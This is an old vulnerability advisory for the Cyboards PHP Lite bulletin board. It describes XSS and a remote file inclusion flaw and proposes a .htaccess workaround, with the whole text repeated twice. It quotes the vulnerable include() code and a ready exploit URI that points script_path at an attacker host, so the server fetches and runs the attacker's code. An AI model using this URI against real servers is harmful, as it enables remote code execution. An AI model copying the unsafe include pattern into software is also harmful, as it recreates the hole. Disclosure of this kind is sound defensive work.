mindwarper@hush.com
21/01/03, 06:40
Cyboards PHP Lite Vulnerability ( By Mindwarper :: mindwarper@hush.com :: )
<------- ------->
----------------------
Vendor Information:
----------------------
Homepage : http://www.gold-sonata.com
Vendor : informed
Mailed advisory: 13/01/03
Vender Response : None yet (possibly because they have no contact page and the report
was sent to abuse@gold-sonata.com)
----------------------
Affected Versions:
----------------------
1.25 and prior
(tested on 1.25 and 1.21)
----------------------
Description:
----------------------
Cyboards PHP Lite is a free open-source bulletin board programmed in php. A couple of
vulnerabilites exist in the /include directory which may result in allowing the attacker
to execute remote code on the server with webserver permission. Another vulnerability
which can be found in /include directory may allow attacker to hijack other members
accounts through XSS.
----------------------
Exploit:
----------------------
XSS:
Possible in the following files and possibly more:
include/default_header.php
include/options_form.php
adminopts/login_form.php
adminopts/include/ban_form.php
adminopts/include/board_form.php
adminopts/include/login_form.php
adminopts/include/vip_form.php
Remote Arbitrary Code Execution:
In a couple of files inside the include directory the php files do not check safely for
inclusion and allow remote users to call them directly. The result of this problem would
allow remote attacker to include their own remote arbitrary code and run it on the server.
1. include/default_header.php
-- This file looks something like this --
****************
...
if(isset($board_config["stylesheet"])&&(trim($board_config["stylesheet"])!="")) {
echo "<LINK REL=STYLESHEET HREF='".$board_config["stylesheet"]."' TYPE='text/css'>\n\n";
} else {
echo "<style>\n";
include("$script_path/include/default_style.css");
echo "\n</style>";
}
...
****************
By default, $board_config["stylesheet"] is not set since it has not been included inside
another forum file. This means that include("$script_path/include/default_style.css");
will be executed. By creating a directory called include on the attacker's server and
placing the desired code inside default_style.css, and attacker can trick the inclusion
and make it include the wrong css file. By doing so, php will execute the attackers code.
The URI looks something like this:
http://victim/forum/include/default_header.php?script_path=http://attacker
where the attacker has created a directory called /include and inside a file called
default_style.css which contains the malicious code.
2. include/options_form.php
Contains the following code on the first line:
---=---
<? include("$script_path/lang/$lang_code/".$lang_code."_options.php"); ?>
---=---
*
Note: An attacker can use this for a XSS attack as well, but given the possibilty of
running remote code on the server it is more probable he/she will use it for remote code
execution.
----------------------
Solution:
----------------------
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /include directory and that should block remote users from accessing it.
----------------------
Greetz:
----------------------
Cyon, daemorhedron, Truckle, Methodus, MC187, DJX.
<------- ------->
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
<------- ------->
----------------------
Vendor Information:
----------------------
Homepage : http://www.gold-sonata.com
Vendor : informed
Mailed advisory: 13/01/03
Vender Response : None yet (possibly because they have no contact page and the report
was sent to abuse@gold-sonata.com)
----------------------
Affected Versions:
----------------------
1.25 and prior
(tested on 1.25 and 1.21)
----------------------
Description:
----------------------
Cyboards PHP Lite is a free open-source bulletin board programmed in php. A couple of
vulnerabilites exist in the /include directory which may result in allowing the attacker
to execute remote code on the server with webserver permission. Another vulnerability
which can be found in /include directory may allow attacker to hijack other members
accounts through XSS.
----------------------
Exploit:
----------------------
XSS:
Possible in the following files and possibly more:
include/default_header.php
include/options_form.php
adminopts/login_form.php
adminopts/include/ban_form.php
adminopts/include/board_form.php
adminopts/include/login_form.php
adminopts/include/vip_form.php
Remote Arbitrary Code Execution:
In a couple of files inside the include directory the php files do not check safely for
inclusion and allow remote users to call them directly. The result of this problem would
allow remote attacker to include their own remote arbitrary code and run it on the server.
1. include/default_header.php
-- This file looks something like this --
****************
...
if(isset($board_config["stylesheet"])&&(trim($board_config["stylesheet"])!="")) {
echo "<LINK REL=STYLESHEET HREF='".$board_config["stylesheet"]."' TYPE='text/css'>\n\n";
} else {
echo "<style>\n";
include("$script_path/include/default_style.css");
echo "\n</style>";
}
...
****************
By default, $board_config["stylesheet"] is not set since it has not been included inside
another forum file. This means that include("$script_path/include/default_style.css");
will be executed. By creating a directory called include on the attacker's server and
placing the desired code inside default_style.css, and attacker can trick the inclusion
and make it include the wrong css file. By doing so, php will execute the attackers code.
The URI looks something like this:
http://victim/forum/include/default_header.php?script_path=http://attacker
where the attacker has created a directory called /include and inside a file called
default_style.css which contains the malicious code.
2. include/options_form.php
Contains the following code on the first line:
---=---
<? include("$script_path/lang/$lang_code/".$lang_code."_options.php"); ?>
---=---
*
Note: An attacker can use this for a XSS attack as well, but given the possibilty of
running remote code on the server it is more probable he/she will use it for remote code
execution.
----------------------
Solution:
----------------------
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /include directory and that should block remote users from accessing it.
----------------------
Greetz:
----------------------
Cyon, daemorhedron, Truckle, Methodus, MC187, DJX.
<------- ------->
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427